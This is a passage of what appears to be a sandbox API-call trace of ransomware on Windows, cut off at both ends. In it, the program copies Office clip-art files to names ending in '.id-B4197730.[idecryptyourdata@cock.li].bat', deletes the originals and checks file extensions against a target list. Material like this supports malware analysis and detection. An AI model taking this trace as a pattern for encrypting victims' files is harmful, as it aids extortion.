GetLastError () returned 0x0 [0196.484] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4b8, lpOverlapped=0x0) returned 1 [0196.667] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4c0, lpOverlapped=0x0) returned 1 [0196.771] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.772] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.772] SetEndOfFile (hFile=0x388) returned 1 [0196.772] CloseHandle (hObject=0x388) returned 1 [0196.772] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.772] SetEndOfFile (hFile=0x380) returned 1 [0196.773] CloseHandle (hObject=0x380) returned 1 [0196.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.806] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf")) returned 1 [0196.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 68 [0196.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 68 [0196.807] lstrlenW (lpString=".doc") returned 4 [0196.807] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.807] lstrlenW (lpString=".docx") returned 5 [0196.807] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.807] lstrlenW (lpString=".pdf") returned 4 [0196.807] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.807] lstrlenW (lpString=".xls") returned 4 [0196.807] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.807] lstrlenW (lpString=".xlsx") returned 5 [0196.807] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.807] lstrlenW (lpString=".ppt") returned 4 [0196.807] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 68 [0196.807] lstrlenW (lpString=".zip") returned 4 [0196.807] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.807] lstrlenW (lpString=".rar") returned 4 [0196.807] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.807] lstrlenW (lpString=".bz2") returned 4 [0196.807] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.807] lstrlenW (lpString=".7z") returned 3 [0196.807] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 68 [0196.807] lstrlenW (lpString=".dbf") returned 4 [0196.807] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 68 [0196.808] lstrlenW (lpString=".1cd") returned 4 [0196.808] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 68 [0196.808] lstrlenW (lpString=".jpg") returned 4 [0196.808] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.808] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.808] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0196.809] GetLastError () returned 0x0 [0196.809] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x22b0, lpOverlapped=0x0) returned 1 [0196.811] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x22c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x22c0, lpOverlapped=0x0) returned 1 [0196.812] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.813] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.813] SetEndOfFile (hFile=0x374) returned 1 [0196.813] CloseHandle (hObject=0x374) returned 1 [0196.813] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.813] SetEndOfFile (hFile=0x360) returned 1 [0196.814] CloseHandle (hObject=0x360) returned 1 [0196.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.814] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf")) returned 1 [0196.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 68 [0196.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 68 [0196.815] lstrlenW (lpString=".doc") returned 4 [0196.815] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.815] lstrlenW (lpString=".docx") returned 5 [0196.815] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0196.815] lstrlenW (lpString=".pdf") returned 4 [0196.815] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.815] lstrlenW (lpString=".xls") returned 4 [0196.815] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.815] lstrlenW (lpString=".xlsx") returned 5 [0196.815] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0196.815] lstrlenW (lpString=".ppt") returned 4 [0196.815] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 68 [0196.815] lstrlenW (lpString=".zip") returned 4 [0196.815] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.816] lstrlenW (lpString=".rar") returned 4 [0196.816] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.816] lstrlenW (lpString=".bz2") returned 4 [0196.816] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.816] lstrlenW (lpString=".7z") returned 3 [0196.816] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 68 [0196.816] lstrlenW (lpString=".dbf") returned 4 [0196.816] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 68 [0196.816] lstrlenW (lpString=".1cd") returned 4 [0196.816] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF") returned 68 [0196.816] lstrlenW (lpString=".jpg") returned 4 [0196.816] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.816] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.816] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0196.817] GetLastError () returned 0x0 [0196.817] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xe78, lpOverlapped=0x0) returned 1 [0196.819] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xe80, lpOverlapped=0x0) returned 1 [0196.820] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.820] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.820] SetEndOfFile (hFile=0x374) returned 1 [0196.820] CloseHandle (hObject=0x374) returned 1 [0196.820] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.820] SetEndOfFile (hFile=0x360) returned 1 [0196.821] CloseHandle (hObject=0x360) returned 1 [0196.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.822] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf")) returned 1 [0196.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 68 [0196.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 68 [0196.822] lstrlenW (lpString=".doc") returned 4 [0196.822] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.822] lstrlenW (lpString=".docx") returned 5 [0196.822] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0196.822] lstrlenW (lpString=".pdf") returned 4 [0196.823] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.823] lstrlenW (lpString=".xls") returned 4 [0196.823] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.823] lstrlenW (lpString=".xlsx") returned 5 [0196.823] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0196.823] lstrlenW (lpString=".ppt") returned 4 [0196.823] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 68 [0196.823] lstrlenW (lpString=".zip") returned 4 [0196.823] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.823] lstrlenW (lpString=".rar") returned 4 [0196.823] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.823] lstrlenW (lpString=".bz2") returned 4 [0196.823] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.823] lstrlenW (lpString=".7z") returned 3 [0196.823] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 68 [0196.823] lstrlenW (lpString=".dbf") returned 4 [0196.823] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 68 [0196.823] lstrlenW (lpString=".1cd") returned 4 [0196.823] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF") returned 68 [0196.823] lstrlenW (lpString=".jpg") returned 4 [0196.823] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.824] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.824] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0196.825] GetLastError () returned 0x0 [0196.825] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xbc0, lpOverlapped=0x0) returned 1 [0196.826] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xbd0, lpOverlapped=0x0) returned 1 [0196.827] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.827] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.827] SetEndOfFile (hFile=0x374) returned 1 [0196.828] CloseHandle (hObject=0x374) returned 1 [0196.828] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.828] SetEndOfFile (hFile=0x360) returned 1 [0196.829] CloseHandle (hObject=0x360) returned 1 [0196.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.829] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf")) returned 1 [0196.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 68 [0196.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 68 [0196.830] lstrlenW (lpString=".doc") returned 4 [0196.830] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.830] lstrlenW (lpString=".docx") returned 5 [0196.830] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0196.830] lstrlenW (lpString=".pdf") returned 4 [0196.830] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.830] lstrlenW (lpString=".xls") returned 4 [0196.830] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.830] lstrlenW (lpString=".xlsx") returned 5 [0196.830] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0196.830] lstrlenW (lpString=".ppt") returned 4 [0196.830] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 68 [0196.830] lstrlenW (lpString=".zip") returned 4 [0196.830] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.830] lstrlenW (lpString=".rar") returned 4 [0196.830] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.830] lstrlenW (lpString=".bz2") returned 4 [0196.830] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.830] lstrlenW (lpString=".7z") returned 3 [0196.830] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 68 [0196.830] lstrlenW (lpString=".dbf") returned 4 [0196.830] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 68 [0196.830] lstrlenW (lpString=".1cd") returned 4 [0196.830] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 68 [0196.831] lstrlenW (lpString=".jpg") returned 4 [0196.831] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.831] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.831] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0196.832] GetLastError () returned 0x0 [0196.832] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4e80, lpOverlapped=0x0) returned 1 [0196.852] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4e90, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4e90, lpOverlapped=0x0) returned 1 [0196.853] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.853] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.853] SetEndOfFile (hFile=0x374) returned 1 [0196.853] CloseHandle (hObject=0x374) returned 1 [0196.853] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.854] SetEndOfFile (hFile=0x360) returned 1 [0196.855] CloseHandle (hObject=0x360) returned 1 [0196.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.855] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf")) returned 1 [0196.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 68 [0196.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 68 [0196.856] lstrlenW (lpString=".doc") returned 4 [0196.856] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.856] lstrlenW (lpString=".docx") returned 5 [0196.856] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0196.856] lstrlenW (lpString=".pdf") returned 4 [0196.856] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.856] lstrlenW (lpString=".xls") returned 4 [0196.856] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.856] lstrlenW (lpString=".xlsx") returned 5 [0196.856] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0196.856] lstrlenW (lpString=".ppt") returned 4 [0196.856] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 68 [0196.856] lstrlenW (lpString=".zip") returned 4 [0196.856] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.856] lstrlenW (lpString=".rar") returned 4 [0196.856] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.856] lstrlenW (lpString=".bz2") returned 4 [0196.856] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.856] lstrlenW (lpString=".7z") returned 3 [0196.856] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 68 [0196.856] lstrlenW (lpString=".dbf") returned 4 [0196.856] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 68 [0196.856] lstrlenW (lpString=".1cd") returned 4 [0196.856] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 68 [0196.857] lstrlenW (lpString=".jpg") returned 4 [0196.857] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.857] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.857] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0196.858] GetLastError () returned 0x0 [0196.858] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x8f0c, lpOverlapped=0x0) returned 1 [0197.144] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x8f10, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x8f10, lpOverlapped=0x0) returned 1 [0197.146] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.146] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.146] SetEndOfFile (hFile=0x374) returned 1 [0197.146] CloseHandle (hObject=0x374) returned 1 [0197.146] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.146] SetEndOfFile (hFile=0x360) returned 1 [0197.147] CloseHandle (hObject=0x360) returned 1 [0197.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf")) returned 1 [0197.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 68 [0197.148] lstrlenW 